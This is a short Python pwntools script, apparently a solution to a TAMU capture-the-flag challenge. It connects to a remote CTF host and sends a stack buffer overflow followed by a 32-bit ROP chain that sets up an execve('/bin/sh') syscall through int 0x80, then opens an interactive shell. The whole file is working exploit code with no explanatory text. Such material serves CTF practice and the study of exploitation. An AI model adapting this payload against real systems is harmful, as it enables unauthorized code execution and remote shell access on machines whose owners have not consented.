#!/usr/bin/env python

from pwn import *

p = remote('pwn.ctf.tamu.edu', 4325)

p.sendline("/bin/sh")             # first name
p.sendline()
p.sendline()
p.sendline()
p.sendline('2')

rop  = p32(0x080733b0)            # pop edx; pop ecx; pop ebx; ret;
rop += p32(0x0)                   # edx == NULL
rop += p32(0x0)                   # ecx == NULL
rop += p32(0x080f1a20)            # ebx == /bin/sh
rop += p32(0x080bc396)            # pop eax; ret;
rop += p32(0xb)                   # eax == 0xb for execve
rop += p32(0x08071005)            # int 0x80

p.sendline('A' * 0x1c + 'B' * 4 + rop)

p.interactive()

